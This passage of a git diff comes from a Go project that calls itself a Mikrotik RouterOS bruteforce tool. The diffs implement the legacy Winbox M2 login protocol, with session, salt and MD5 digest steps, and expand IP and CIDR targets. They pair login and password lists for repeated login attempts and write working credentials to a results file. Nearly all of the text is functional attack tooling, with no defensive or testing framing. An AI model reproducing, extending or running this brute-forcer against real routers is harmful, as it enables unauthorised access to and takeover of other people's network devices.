default ports + if getParamSwitch("append-default-ports") { + for _, port2 := range getParamIntSlice("port") { + if port != port2 { + ports = append(ports, port2) + } + } + } + + numParsed += parseIPOrCIDR(ip, ports, isIPv6) + } + } + + logIf(totalIPv6Skipped > 0, "ep", 0, "skipped %v IPv6 targets due to no-ipv6 flag", totalIPv6Skipped) + log("ep", 1, "finished parsing endpoints: parsed %v out of total %v", numParsed, endpoints.Len()) +} diff --git a/go.mod b/go.mod index e946f94..fbd155e 100644 --- a/go.mod +++ b/go.mod @@ -1,3 +1,3 @@ module mtbf -go 1.18 \ No newline at end of file +go 1.18 diff --git a/legacy-winbox.go b/legacy-winbox.go index d11c6e7..9a3533e 100644 --- a/legacy-winbox.go +++ b/legacy-winbox.go @@ -1,13 +1,13 @@ package main import ( - "bytes" - "crypto/md5" - "encoding/binary" - "errors" - "fmt" - "io" - "strconv" + "bytes" + "crypto/md5" + "encoding/binary" + "errors" + "fmt" + "io" + "strconv" ) const MT_BOOL_FALSE byte = 0x00 @@ -25,415 +25,396 @@ const MT_REQUEST_ID = 0xFF0006 const MT_COMMAND = 0xFF0007 type M2Element struct { - code int - value interface{} + code int + value interface{} } func (el *M2Element) String() string { - return fmt.Sprintf("code=%v,type=%T,value=%v", el.code, el.value, el.value) + return fmt.Sprintf("code=%v,type=%T,value=%v", el.code, el.value, el.value) } - type M2Message struct { - el []M2Element + el []M2Element } type M2Hash string func NewM2Message() *M2Message { - m2 := M2Message{} - return &m2 + m2 := M2Message{} + return &m2 } func (m2 *M2Message) Clear() { - m2.el = []M2Element{} + m2.el = []M2Element{} } func (m2 *M2Message) Append(code int, value interface{}) { - if m2.el == nil { - m2.Clear() - } - m2.el = append(m2.el, M2Element{code: code, value: value}) + if m2.el == nil { + m2.Clear() + } + m2.el = append(m2.el, M2Element{code: code, value: value}) } func (m2 *M2Message) AppendElement(el *M2Element) { - if m2.el == nil { - m2.Clear() - } - m2.el = append(m2.el, *el) + if m2.el == nil { + m2.Clear() + } + m2.el = append(m2.el, *el) } func (m2 *M2Message) Bytes() []byte { - res := []byte{} - - for _, el := range m2.el { - buf := new(bytes.Buffer) - - binary.Write(buf, binary.LittleEndian, uint16(el.code)) - binary.Write(buf, binary.LittleEndian, byte(el.code >> 16)) - - switch v := el.value.(type) { - case bool: - binary.Write(buf, binary.LittleEndian, v) - case byte: - binary.Write(buf, binary.LittleEndian, byte(MT_BYTE)) - binary.Write(buf, binary.LittleEndian, v) - case int: - binary.Write(buf, binary.LittleEndian, byte(MT_DWORD)) - binary.Write(buf, binary.LittleEndian, int32(v)) - case uint: - binary.Write(buf, binary.LittleEndian, byte(MT_DWORD)) - binary.Write(buf, binary.LittleEndian, uint32(v)) - case string: - binary.Write(buf, binary.LittleEndian, byte(MT_STRING)) - binary.Write(buf, binary.LittleEndian, byte(len(v))) - binary.Write(buf, binary.LittleEndian, []byte(v)) - case M2Hash: - binary.Write(buf, binary.LittleEndian, byte(MT_HASH)) - binary.Write(buf, binary.LittleEndian, byte(len(v))) - binary.Write(buf, binary.LittleEndian, []byte(v)) - case []byte: - binary.Write(buf, binary.LittleEndian, byte(MT_ARRAY)) - binary.Write(buf, binary.LittleEndian, uint16(len(v))) - for _, i := range v { - binary.Write(buf, binary.LittleEndian, int32(i)) - } - case []int: - binary.Write(buf, binary.LittleEndian, byte(MT_ARRAY)) - binary.Write(buf, binary.LittleEndian, uint16(len(v))) - for _, i := range v { - binary.Write(buf, binary.LittleEndian, int32(i)) - } - } - - res = append(res, buf.Bytes()...) - } - - header := make([]byte, 6) - header[0] = byte(len(res) + 4) - header[1] = 0x01 - header[2] = 0x00 - header[3] = byte(len(res) + 2) - header[4] = 0x4D - header[5] = 0x32 - - return append(header, res...) + res := []byte{} + + for _, el := range m2.el { + buf := new(bytes.Buffer) + + binary.Write(buf, binary.LittleEndian, uint16(el.code)) + binary.Write(buf, binary.LittleEndian, byte(el.code>>16)) + + switch v := el.value.(type) { + case bool: + binary.Write(buf, binary.LittleEndian, v) + case byte: + binary.Write(buf, binary.LittleEndian, byte(MT_BYTE)) + binary.Write(buf, binary.LittleEndian, v) + case int: + binary.Write(buf, binary.LittleEndian, byte(MT_DWORD)) + binary.Write(buf, binary.LittleEndian, int32(v)) + case uint: + binary.Write(buf, binary.LittleEndian, byte(MT_DWORD)) + binary.Write(buf, binary.LittleEndian, uint32(v)) + case string: + binary.Write(buf, binary.LittleEndian, byte(MT_STRING)) + binary.Write(buf, binary.LittleEndian, byte(len(v))) + binary.Write(buf, binary.LittleEndian, []byte(v)) + case M2Hash: + binary.Write(buf, binary.LittleEndian, byte(MT_HASH)) + binary.Write(buf, binary.LittleEndian, byte(len(v))) + binary.Write(buf, binary.LittleEndian, []byte(v)) + case []byte: + binary.Write(buf, binary.LittleEndian, byte(MT_ARRAY)) + binary.Write(buf, binary.LittleEndian, uint16(len(v))) + for _, i := range v { + binary.Write(buf, binary.LittleEndian, int32(i)) + } + case []int: + binary.Write(buf, binary.LittleEndian, byte(MT_ARRAY)) + binary.Write(buf, binary.LittleEndian, uint16(len(v))) + for _, i := range v { + binary.Write(buf, binary.LittleEndian, int32(i)) + } + } + + res = append(res, buf.Bytes()...) + } + + header := make([]byte, 6) + header[0] = byte(len(res) + 4) + header[1] = 0x01 + header[2] = 0x00 + header[3] = byte(len(res) + 2) + header[4] = 0x4D + header[5] = 0x32 + + return append(header, res...) } - func (m2 *M2Message) ParseM2Element(buf io.Reader) error { - var codeAndType uint32 - err := binary.Read(buf, binary.LittleEndian, &codeAndType) - if err != nil { - return err - } - - el := M2Element{code: int(codeAndType & 0x00FFFFFF)} - keyType := byte(codeAndType >> 24) - log("lw", 3, "m2 code=%v type=%v", el.code, keyType) - - switch keyType { - case MT_BOOL_FALSE, MT_BOOL_TRUE: - el.value = keyType == MT_BOOL_TRUE - log("lw", 3, "m2 MT_BOOL: %v", el.value.(bool)) - case MT_BYTE: - var b byte - err = binary.Read(buf, binary.LittleEndian, &b) - el.value = b - log("lw", 3, "m2 MT_BYTE: %v", el.value.(byte)) - case MT_DWORD: - var b int32 - err = binary.Read(buf, binary.LittleEndian, &b) - el.value = b - log("lw", 3, "m2 MT_DWORD: %v", el.value.(int32)) - - case MT_STRING: - var length byte - err = binary.Read(buf, binary.LittleEndian, &length) - if err != nil { - return err - } - - bs := make([]byte, length) - _, err = io.ReadFull(buf, bs) - el.value = string(bs) - log("lw", 3, "m2 MT_STRING (len %v): %v", length, el.value.(string)) - - case MT_HASH: - var length byte - err = binary.Read(buf, binary.LittleEndian, &length) - if err != nil { - return err - } - - bs := make([]byte, length) - _, err = io.ReadFull(buf, bs) - el.value = M2Hash(bs) - log("lw", 3, "m2 MT_HASH (len %v): %v", length, []byte(el.value.(M2Hash))) - - case MT_ARRAY: - var length uint16 - err = binary.Read(buf, binary.LittleEndian, &length) - if err != nil { - return err - } - - sl := []int{} - for i := 0; i < int(length); i++ { - var el2 int32 - err = binary.Read(buf, binary.LittleEndian, &el2) - if err != nil { - break - } - sl = append(sl, int(el2)) - } - el.value = sl - log("lw", 3, "m2 MT_HASH (len %v): %v", length, el.value.([]int)) - - default: - return errors.New("unknown key code " + strconv.Itoa(int(keyType))) - } - - if err != nil { - return err - } - - m2.el = append(m2.el, el) - return nil + var codeAndType uint32 + err := binary.Read(buf, binary.LittleEndian, &codeAndType) + if err != nil { + return err + } + + el := M2Element{code: int(codeAndType & 0x00FFFFFF)} + keyType := byte(codeAndType >> 24) + log("lw", 3, "m2 code=%v type=%v", el.code, keyType) + + switch keyType { + case MT_BOOL_FALSE, MT_BOOL_TRUE: + el.value = keyType == MT_BOOL_TRUE + log("lw", 3, "m2 MT_BOOL: %v", el.value.(bool)) + case MT_BYTE: + var b byte + err = binary.Read(buf, binary.LittleEndian, &b) + el.value = b + log("lw", 3, "m2 MT_BYTE: %v", el.value.(byte)) + case MT_DWORD: + var b int32 + err = binary.Read(buf, binary.LittleEndian, &b) + el.value = b + log("lw", 3, "m2 MT_DWORD: %v", el.value.(int32)) + + case MT_STRING: + var length byte + err = binary.Read(buf, binary.LittleEndian, &length) + if err != nil { + return err + } + + bs := make([]byte, length) + _, err = io.ReadFull(buf, bs) + el.value = string(bs) + log("lw", 3, "m2 MT_STRING (len %v): %v", length, el.value.(string)) + + case MT_HASH: + var length byte + err = binary.Read(buf, binary.LittleEndian, &length) + if err != nil { + return err + } + + bs := make([]byte, length) + _, err = io.ReadFull(buf, bs) + el.value = M2Hash(bs) + log("lw", 3, "m2 MT_HASH (len %v): %v", length, []byte(el.value.(M2Hash))) + + case MT_ARRAY: + var length uint16 + err = binary.Read(buf, binary.LittleEndian, &length) + if err != nil { + return err + } + + sl := []int{} + for i := 0; i < int(length); i++ { + var el2 int32 + err = binary.Read(buf, binary.LittleEndian, &el2) + if err != nil { + break + } + sl = append(sl, int(el2)) + } + el.value = sl + log("lw", 3, "m2 MT_HASH (len %v): %v", length, el.value.([]int)) + + default: + return errors.New("unknown key code " + strconv.Itoa(int(keyType))) + } + + if err != nil { + return err + } + + m2.el = append(m2.el, el) + return nil } func (m2 *M2Message) ParseM2Message(buf io.Reader) error { - var headerBlockSize, m2BlockSize byte - var m2Extra, m2Header uint16 - err := binary.Read(buf, binary.LittleEndian, &headerBlockSize) - err = binary.Read(buf, binary.LittleEndian, &m2Extra) - err = binary.Read(buf, binary.LittleEndian, &m2BlockSize) - err = binary.Read(buf, binary.LittleEndian, &m2Header) - if err != nil { - return err - } - if m2Extra != 0x1 { - return errors.New("invalid M2_EXTRA") - } - if m2Header != 0x324D { - return errors.New("invalid M2_HEADER") - } - - for { - log("lw", 3, "parsing new m2 element") - err := m2.ParseM2Element(buf) - if err != nil { - return err - } - } + var headerBlockSize, m2BlockSize byte + var m2Extra, m2Header uint16 + err := binary.Read(buf, binary.LittleEndian, &headerBlockSize) + err = binary.Read(buf, binary.LittleEndian, &m2Extra) + err = binary.Read(buf, binary.LittleEndian, &m2BlockSize) + err = binary.Read(buf, binary.LittleEndian, &m2Header) + if err != nil { + return err + } + if m2Extra != 0x1 { + return errors.New("invalid M2_EXTRA") + } + if m2Header != 0x324D { + return errors.New("invalid M2_HEADER") + } + + for { + log("lw", 3, "parsing new m2 element") + err := m2.ParseM2Element(buf) + if err != nil { + return err + } + } } func ParseM2Messages(src []byte) (messages []M2Message, err error) { - messages = []M2Message{} + messages = []M2Message{} buf := bytes.NewReader(src) - for { - m2 := NewM2Message() - err := m2.ParseM2Message(buf) - - if err == io.EOF { - messages = append(messages, *m2) - break - } else if err != nil { - return nil, err - } else { - messages = append(messages, *m2) - } - } - - - log("lw", 3, "m2 eof after %v messages", len(messages)) - return messages, nil + for { + m2 := NewM2Message() + err := m2.ParseM2Message(buf) + + if err == io.EOF { + messages = append(messages, *m2) + break + } else if err != nil { + return nil, err + } else { + messages = append(messages, *m2) + } + } + + log("lw", 3, "m2 eof after %v messages", len(messages)) + return messages, nil } - - - - - - - - - type LegacyWinbox struct { - task *Task - stage int - m2 []M2Message + task *Task + conn *Connection + stage int + m2 []M2Message } -func NewLegacyWinbox(task *Task) *LegacyWinbox { - lw := LegacyWinbox{task: task, stage: -1, m2: []M2Message{}} - return &lw +func NewLegacyWinbox(task *Task, conn *Connection) *LegacyWinbox { + lw := LegacyWinbox{task: task, conn: conn, stage: -1, m2: []M2Message{}} + return &lw } - // req1 func (lw *LegacyWinbox) MTReqList() []byte { - m2 := NewM2Message() - m2.Append(MT_RECEIVER, []byte{2, 2}) - m2.Append(MT_COMMAND, byte(7)) - m2.Append(MT_REQUEST_ID, byte(1)) - m2.Append(MT_REPLY_EXPECTED, true) - m2.Append(1, "list") - return m2.Bytes() + m2 := NewM2Message() + m2.Append(MT_RECEIVER, []byte{2, 2}) + m2.Append(MT_COMMAND, byte(7)) + m2.Append(MT_REQUEST_ID, byte(1)) + m2.Append(MT_REPLY_EXPECTED, true) + m2.Append(1, "list") + return m2.Bytes() } // res1 func (lw *LegacyWinbox) MTGetSid(m2 []M2Message) *M2Element { - for _, msg := range m2 { - for _, el := range msg.el { - if el.code == 0xFE0001 { - return &el - } - } - } - - return nil + for _, msg := range m2 { + for _, el := range msg.el { + if el.code == 0xFE0001 { + return &el + } + } + } + + return nil } - // req2 func (lw *LegacyWinbox) MTReqChallenge(sid *M2Element) []byte { - m2 := NewM2Message() - m2.Append(MT_RECEIVER, []byte{13, 4}) - m2.Append(MT_COMMAND, byte(4)) - m2.Append(MT_REQUEST_ID, byte(2)) - m2.AppendElement(sid) - m2.Append(MT_REPLY_EXPECTED, true) - return m2.Bytes() + m2 := NewM2Message() + m2.Append(MT_RECEIVER, []byte{13, 4}) + m2.Append(MT_COMMAND, byte(4)) + m2.Append(MT_REQUEST_ID, byte(2)) + m2.AppendElement(sid) + m2.Append(MT_REPLY_EXPECTED, true) + return m2.Bytes() } // res2 func (lw *LegacyWinbox) MTGetSalt(m2 []M2Message) M2Hash { - for _, msg := range m2 { - for _, el := range msg.el { - if el.code == 0x9 { - return el.value.(M2Hash) - } - } - } - - return "" + for _, msg := range m2 { + for _, el := range msg.el { + if el.code == 0x9 { + return el.value.(M2Hash) + } + } + } + + return "" } - // req3 func (lw *LegacyWinbox) MTReqAuth(sid *M2Element, login, digest, salt string) []byte { - m2 := NewM2Message() - m2.Append(MT_RECEIVER, []byte{13, 4}) - m2.Append(MT_COMMAND, byte(1)) - m2.Append(MT_REQUEST_ID, byte(3)) - m2.AppendElement(sid) - m2.Append(MT_REPLY_EXPECTED, true) - m2.Append(1, login) - m2.Append(9, M2Hash(salt)) - m2.Append(10, M2Hash(digest)) - return m2.Bytes() + m2 := NewM2Message() + m2.Append(MT_RECEIVER, []byte{13, 4}) + m2.Append(MT_COMMAND, byte(1)) + m2.Append(MT_REQUEST_ID, byte(3)) + m2.AppendElement(sid) + m2.Append(MT_REPLY_EXPECTED, true) + m2.Append(1, login) + m2.Append(9, M2Hash(salt)) + m2.Append(10, M2Hash(digest)) + return m2.Bytes() } // res3 func (lw *LegacyWinbox) MTGetResult(m2 []M2Message) (res bool, err error) { - for _, msg := range m2 { - for _, el := range msg.el { - if el.code == 0xA { - _, ok := el.value.(M2Hash) - if ok { - return true, nil - } - } else if el.code == 0xFF0008 { - v, ok := el.value.(int32) - if ok && v == 0xFE0006 { - return false, nil - } - } - } - } - - return false, errors.New("no auth marker found") + for _, msg := range m2 { + for _, el := range msg.el { + if el.code == 0xA { + _, ok := el.value.(M2Hash) + if ok { + return true, nil + } + } else if el.code == 0xFF0008 { + v, ok := el.value.(int32) + if ok && v == 0xFE0006 { + return false, nil + } + } + } + } + + return false, errors.New("no auth marker found") } - - - func (lw *LegacyWinbox) SendRecv(buf []byte) (res []byte, err error) { - _, err = lw.task.conn.Write(buf) - if err != nil { - log("lw", 1, "failed to send: %v", err.Error()) - return nil, err - } - - resp := make([]byte, 1024) - n, err := lw.task.conn.Read(resp) - if err != nil { - log("lw", 1, "failed to recv: %v", err.Error()) - return nil, err - } - - return resp[:n], nil + err = lw.conn.Send(buf) + if err != nil { + log("lw", 1, "failed to send: %v", err.Error()) + return nil, err + } + + resp, err := lw.conn.Recv() + if err != nil { + log("lw", 1, "failed to recv: %v", err.Error()) + return nil, err + } + + return resp, nil } - func (lw *LegacyWinbox) TryLogin() (res bool, err error) { - log("lw", 2, "login: stage 1, req_list") - r1, err := lw.SendRecv(lw.MTReqList()) - if err != nil { - return false, err - } - - log("lw", 2, "login: stage 2, got response for req_list") - msg, err := ParseM2Messages(r1) - if err != nil { - return false, err - } - - sid := lw.MTGetSid(msg) - if sid == nil { - return false, errors.New("failed to get SID from stage 2") - } - log("lw", 2, "login: stage 2, sid %v", sid.String()) - r2, err := lw.SendRecv(lw.MTReqChallenge(sid)) - if err != nil { - return false, err - } - - log("lw", 2, "login: stage 3, got response for req_challenge") - log("lw", 2, "r2: %v", r2) - - msg, err = ParseM2Messages(r2) - if err != nil { - return false, err - } - - salt := lw.MTGetSalt(msg) - if salt == "" { - return false, errors.New("failed to get salt from stage 3") - } - - sl := []byte{0} - sl = append(sl, []byte(lw.task.password)...) - sl = append(sl, []byte(salt)...) - d := md5.Sum(sl) - digest := append([]byte{0}, d[:]...) - - log("lw", 2, "login: stage 3, hash %v", digest) - r3, err := lw.SendRecv(lw.MTReqAuth(sid, lw.task.login, string(digest), string(salt))) - if err != nil { - return false, err - } - - log("lw", 2, "login: stage 4, got response for req_salt") - msg, err = ParseM2Messages(r3) - if err != nil { - return false, err - } - - res, err = lw.MTGetResult(msg) - log("lw", 2, "login: stage 5: res=%v err=%v", res, err) - - return res, err + log("lw", 2, "login: stage 1, req_list") + r1, err := lw.SendRecv(lw.MTReqList()) + if err != nil { + return false, err + } + + log("lw", 2, "login: stage 2, got response for req_list") + msg, err := ParseM2Messages(r1) + if err != nil { + return false, err + } + + sid := lw.MTGetSid(msg) + if sid == nil { + return false, errors.New("failed to get SID from stage 2") + } + log("lw", 2, "login: stage 2, sid %v", sid.String()) + r2, err := lw.SendRecv(lw.MTReqChallenge(sid)) + if err != nil { + return false, err + } + + log("lw", 2, "login: stage 3, got response for req_challenge") + log("lw", 2, "r2: %v", r2) + + msg, err = ParseM2Messages(r2) + if err != nil { + return false, err + } + + salt := lw.MTGetSalt(msg) + if salt == "" { + return false, errors.New("failed to get salt from stage 3") + } + + sl := []byte{0} + sl = append(sl, []byte(lw.task.password)...) + sl = append(sl, []byte(salt)...) + d := md5.Sum(sl) + digest := append([]byte{0}, d[:]...) + + log("lw", 2, "login: stage 3, hash %v", digest) + r3, err := lw.SendRecv(lw.MTReqAuth(sid, lw.task.login, string(digest), string(salt))) + if err != nil { + return false, err + } + + log("lw", 2, "login: stage 4, got response for req_salt") + msg, err = ParseM2Messages(r3) + if err != nil { + return false, err + } + + res, err = lw.MTGetResult(msg) + log("lw", 2, "login: stage 5: res=%v err=%v", res, err) + + return res, err } diff --git a/log.go b/log.go index 9b3f30a..d3b2a70 100644 --- a/log.go +++ b/log.go @@ -1,13 +1,22 @@ package main +// log.go: logging + import ( "fmt" "os" "strings" ) +func init() { + registerParam("log-level", 0, "max log level, useful for debugging. -1 logs everything") + registerParamWithCallback("log-modules", []string{}, "always log output from these modules", updateModuleMap) + registerParamWithCallback("no-log-modules", []string{}, "never log output from these modules", updateModuleMap) + registerParamHidden("log-module-map", map[string]bool{}) +} + func shouldLog(facility string, level, maxLevel int) bool { - moduleMap := CfgGet("log-module-map").(map[string]bool) + moduleMap := getParam[map[string]bool]("log-module-map") logModule, ok := moduleMap[strings.ToLower(facility)] if ok { @@ -22,7 +31,7 @@ func shouldLog(facility string, level, maxLevel int) bool { } func log(facility string, level int, s string, params ...interface{}) { - maxLevel := CfgGetInt("log-level") + maxLevel := getParamInt("log-level") if !shouldLog(facility, level, maxLevel) { return } @@ -64,8 +73,8 @@ func failIf(condition bool, s string, params ...interface{}) { } func updateModuleMap() { - logModules := CfgGet("log-modules").([]string) - noLogModules := CfgGet("no-log-modules").([]string) + logModules := getParamStringSlice("log-modules") + noLogModules := getParamStringSlice("no-log-modules") newMap := map[string]bool{} @@ -76,16 +85,9 @@ func updateModuleMap() { for _, module := range noLogModules { module = strings.ToLower(module) - failIf(newMap[module] == true, "log module \"%v\" is defined both in log-modules and no-log-modules", module) + failIf(newMap[module], "log module \"%v\" is defined both in log-modules and no-log-modules", module) newMap[module] = false } - CfgSet("log-module-map", newMap) -} - -func init() { - CfgRegister("log-level", 0, "max log level, useful for debugging. -1 logs everything") - CfgRegisterCallback("log-modules", []string{}, "always log output from these modules", updateModuleMap) - CfgRegisterCallback("no-log-modules", []string{}, "never log output from these modules", updateModuleMap) - CfgRegisterHidden("log-module-map", map[string]bool{}) + setParam("log-module-map", newMap) } diff --git a/math.go b/math.go index c9fb82b..fea03fd 100644 --- a/math.go +++ b/math.go @@ -1,7 +1,8 @@ package main +// math.go: mathematical routines + import ( - _ "fmt" "math" ) diff --git a/mtbf.go b/mtbf.go index 55f4ea6..c3c0c1c 100644 --- a/mtbf.go +++ b/mtbf.go @@ -4,13 +4,13 @@ func main() { log("main", 0, "mtbf: Mikrotik RouterOS bruteforce | v1.0.1") parseAppConfig() - OpenOutFile() - defer CloseOutFile() + go ResultService() + defer EndResults() + LoadSources() defer CloseSources() - wg := InitializeThreads() - WaitForThreads(wg) + ThreadService() log("main", 0, "finished") } diff --git a/results.go b/results.go index 4dc4bf0..4a6c0af 100644 --- a/results.go +++ b/results.go @@ -1,25 +1,50 @@ package main +// results.go: saves good results to a file or console + import ( "fmt" "os" ) +func init() { + registerParam("out-file", "good.txt", "results will be saved in this file") + registerAlias("o", "out-file") +} + var outFile *os.File +var resultChannel chan *Task + +func ResultService() { + openResultFile() + defer closeResultFile() -func RegisterResult(t *Task, good bool) { - if good { - log("res", 0, "****************\n******** OK: %v %v %v\n****************", t.e.String(), t.login, t.password) + resultChannel = make(chan *Task, 128) + + for task := range resultChannel { if outFile != nil { - fmt.Fprintf(outFile, "%v\t%v\t%v\n", t.e.String(), t.login, t.password) + fmt.Fprintf(outFile, "%v\n", task.String()) } + } +} + +func RegisterResult(task *Task, good bool) { + if !good { + log("res", 1, "bad: %v", task.String()) } else { - log("res", 1, "bad: %v %v %v", t.e.String(), t.login, t.password) + log("res", 0, "good: %v", task.String()) + if outFile != nil { + resultChannel <- task + } } } -func OpenOutFile() { - fileName := CfgGetString("out-file") +func EndResults() { + close(resultChannel) +} + +func openResultFile() { + fileName := getParamString("out-file") if fileName == "" { log("out", 0, "WARNING: out-file is not specified, results will only be logged in console") outFile = nil @@ -28,19 +53,17 @@ func OpenOutFile() { outFile, err = os.OpenFile(fileName, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644) if err != nil { - fail("error opening output file \"%v\": %v", fileName, err.Error()) + fail("error opening result file \"%v\": %v", fileName, err.Error()) } - log("out", 2, "opened output file \"%v\"", fileName) + log("out", 2, "opened result file \"%v\"", fileName) } } -func CloseOutFile() { - outFile.Close() - outFile = nil -} - -func init() { - CfgRegister("out-file", "good.txt", "results will be saved in this file") - CfgRegisterAlias("o", "out-file") +func closeResultFile() { + if outFile != nil { + outFile.Close() + outFile = nil + log("out", 2, "closed result file") + } } diff --git a/service.go b/service.go index c52a0ce..74359e7 100644 --- a/service.go +++ b/service.go @@ -2,12 +2,11 @@ package main import ( "errors" - "net" ) // TODO: multiple services... -func TryLogin(task *Task, conn net.Conn) (res bool, err error) { +func TryLogin(task *Task, conn *Connection) (res bool, err error) { defer func() { if r := recover(); r != nil { log("srv", 1, "fatal error (panic) in service handler: %v", r) diff --git a/source.go b/source.go index e186b62..93abe86 100644 --- a/source.go +++ b/source.go @@ -8,64 +8,114 @@ import ( "sync" ) -type Source struct { - name string // name of this source +// SrcIP, SrcLogin and SrcPassword represent different source types. +var SrcIP Source = Source{name: "ip", plainParmName: "ip", filesParmName: "ip-file"} +var SrcLogin Source = Source{name: "login", plainParmName: "login", filesParmName: "login-file"} +var SrcPassword Source = Source{name: "password", plainParmName: "password", + filesParmName: "password-file", transform: func(item string) (res string, err error) { + if getParamSwitch("no-password-trim") { + return item, nil + } else { + return strings.TrimSpace(item), nil + } + }} - plain []string // sources from commandline - contents []string // sources from files +func init() { + registerParam("ip", []string{}, "IPs or subnets in CIDR notation") + registerParam("ip-file", []string{}, "paths to files with IPs or subnets in CIDR notation (one entry per line)") + registerParam("login", []string{}, "one or more logins") + registerParam("login-file", []string{}, "paths to files with logins (one entry per line)") + registerParam("password", []string{}, "one or more passwords") + registerParam("password-file", []string{}, "paths to files with passwords (one entry per line)") - files []*os.File // file pointers - fileNames []string // file names - plainParmName string // name of "plain" commandline parameter - filesParmName string // name of "files" commandline parameter + registerSwitch("add-empty-password", "insert an empty password to the password list") + registerSwitch("no-password-trim", "preserve leading and trailing spaces in passwords") + registerSwitch("logins-first", "increment logins before passwords") + registerSwitch("file-contents-first", "try to go through source files first, defer commandline args for later") +} - transform func(item string) (string, error) // optional transformation function +// LoadSources loads contents for all sources. +func LoadSources() { + log("src", 1, "loading sources") - fetchMutex sync.Mutex // sync mutex -} + var wg sync.WaitGroup + wg.Add(3) + go SrcIP.LoadSource(&wg) + go SrcLogin.LoadSource(&wg) + go SrcPassword.LoadSource(&wg) + wg.Wait() -// both -1: exhausted -// both 0: not started yet -type SourcePos struct { - plainIdx int - contentIdx int -} + SrcIP.ReportLoaded() + SrcLogin.ReportLoaded() + SrcPassword.ReportLoaded() -// String converts a SourcePos to its string representation. -func (pos *SourcePos) String() string { - return "P" + strconv.Itoa(pos.plainIdx) + "/C" + strconv.Itoa(pos.contentIdx) + ParseEndpoints(SrcIP.plain) + ParseEndpoints(SrcIP.contents) + + log("src", 1, "ok: finished loading sources") } -// Exhausted checks if a SourcePos can no longer produce any sources. -func (pos *SourcePos) Exhausted() bool { - return pos.plainIdx == -1 && pos.contentIdx == -1 +// CloseSources closes all source files. +func CloseSources() { + log("src", 1, "closing sources") + + SrcIP.CloseSource() + SrcLogin.CloseSource() + SrcPassword.CloseSource() + + log("src", 1, "ok: finished closing sources") } -// Reset moves a SourcePos to its starting position. -func (pos *SourcePos) Reset() { - pos.plainIdx = 0 - pos.contentIdx = 0 - log("src", 3, "resetting source pos") +// LoadSource fills a Source with data (from commandline and from files). +func (src *Source) LoadSource(wg *sync.WaitGroup) { + if wg != nil { + defer wg.Done() + } + + if src.name == "password" && getParamSwitch("add-empty-password") { + src.plain = append(src.plain, "") + } + + src.ParsePlain() + + src.OpenFiles() + defer src.CloseSource() + + src.ParseFiles() + failIf(len(src.contents)+len(src.plain) == 0, "no %vs defined: check %v and %v parameters", src, src.plainParmName, src.filesParmName) } -// passwordTransform is a transformation function for a password. -func passwordTransform(item string) (res string, err error) { - if getParamSwitch("no-password-trim") { - return item, nil - } else { - return strings.TrimSpace(item), nil +// CloseSource closes all files for a Source. +func (src *Source) CloseSource() { + l := len(src.files) + for _, file := range src.files { + if file != nil { + file.Close() + } } + + src.files = nil + src.fileNames = nil + log("src", 1, "closed all %v %v files", l, src) } -// SrcIP, SrcLogin and SrcPassword represent different sources. -var SrcIP Source = Source{name: "ip", plainParmName: "ip", filesParmName: "ip-file"} -var SrcLogin Source = Source{name: "login", plainParmName: "login", filesParmName: "login-file"} -var SrcPassword Source = Source{name: "password", plainParmName: "password", - filesParmName: "password-file", transform: passwordTransform} +// OpenFiles opens all files for a Source. +func (src *Source) OpenFiles() { + fileNames := getParamStringSlice(src.filesParmName) -// String converts a Source to its string representation. -func (src *Source) String() string { - return src.name + for _, fileName := range fileNames { + f, err := os.Open(fileName) + if err != nil { + fail("error opening source file \"%v\": %v", fileName, err.Error()) + } + + src.files = append(src.files, f) + src.fileNames = append(src.fileNames, fileName) + } + + if len(src.files) > 0 { + log("src", 1, "opened %v %v files", len(src.files), src) + } } // ValidateAndTransformItem attempts to validate a source item @@ -84,51 +134,6 @@ func (src *Source) ValidateAndTransformItem(item string) (res string, err error) } } -// FetchFromSlice retrieves an item from a string slice and optionally increments its current position. -func (src *Source) FetchFromSlice(name string, idx *int, slice []string, inc bool) (res string, empty bool) { - if *idx == -1 { // exhausted - log("src", 5, "fetch %v from %v: idx is -1, return empty", src, name) - return "", true - } - - if *idx >= len(slice) { - log("src", 5, "fetch %v from %v: idx >= slice length (%v >= %v), marking as exhausted, return empty", src, name, *idx, len(slice)) - *idx = -1 - return "", true - } - - res = slice[*idx] - log("src", 5, "fetch %v from %v: ok, got %v at idx %v", src, name, res, *idx) - - if inc { - *idx = *idx + 1 - log("src", 5, "fetch %v from %v: incrementing idx to %v", src, name, *idx) - } - - return res, false -} - -// FetchOne retrieves an item from a Source with a specified SourcePos. -func (src *Source) FetchOne(pos *SourcePos, inc bool) (res string, empty bool) { - src.fetchMutex.Lock() - defer src.fetchMutex.Unlock() - - if getParamSwitch("file-contents-first") { - res, empty = src.FetchFromSlice("contents", &pos.contentIdx, src.contents, inc) - if empty { - res, empty = src.FetchFromSlice("plain", &pos.plainIdx, src.plain, inc) - } - } else { - res, empty = src.FetchFromSlice("plain", &pos.plainIdx, src.plain, inc) - if empty { - res, empty = src.FetchFromSlice("contents", &pos.contentIdx, src.contents, inc) - } - } - - logIf(empty, "src", 2, "exhausted source %v for pos %v", src, pos.String()) - return res, empty -} - // ParsePlain parses commandline parameters for a Source. func (src *Source) ParsePlain() { for _, plain := range getParamStringSlice(src.plainParmName) { @@ -145,26 +150,7 @@ func (src *Source) ParsePlain() { } } -// OpenFiles opens all files for a Source. -func (src *Source) OpenFiles() { - fileNames := getParamStringSlice(src.filesParmName) - - for _, fileName := range fileNames { - f, err := os.Open(fileName) - if err != nil { - fail("error opening source file \"%v\": %v", fileName, err.Error()) - } - - src.files = append(src.files, f) - src.fileNames = append(src.fileNames, fileName) - } - - if len(src.files) > 0 { - log("src", 1, "opened %v %v files", len(src.files), src) - } -} - -// ParseFiles parses all files for a Source. +// ParseFiles parses files for a Source. func (src *Source) ParseFiles() { for i, file := range src.files { fileName := src.fileNames[i] @@ -193,95 +179,101 @@ func (src *Source) ParseFiles() { } } -// FailIfEmpty throws an exception if a source is empty. -func (src *Source) FailIfEmpty() { - failIf(len(src.contents)+len(src.plain) == 0, "no %vs defined: check %v and %v parameters", src, src.plainParmName, src.filesParmName) -} - // ReportLoaded prints a console message about the number of loaded items for a Source. func (src *Source) ReportLoaded() { log("src", 0, "loaded %vs: %v items from commandline and %v items from files", src, len(src.plain), len(src.contents)) } -// LoadSource fills a Source with data (from commandline and from files). -func (src *Source) LoadSource(wg *sync.WaitGroup) { - if wg != nil { - defer wg.Done() +type Source struct { + name string // name of this source + + plain []string // sources from commandline + contents []string // sources from files + + files []*os.File // file pointers + fileNames []string // file names + plainParmName string // name of "plain" commandline parameter + filesParmName string // name of "files" commandline parameter + + transform 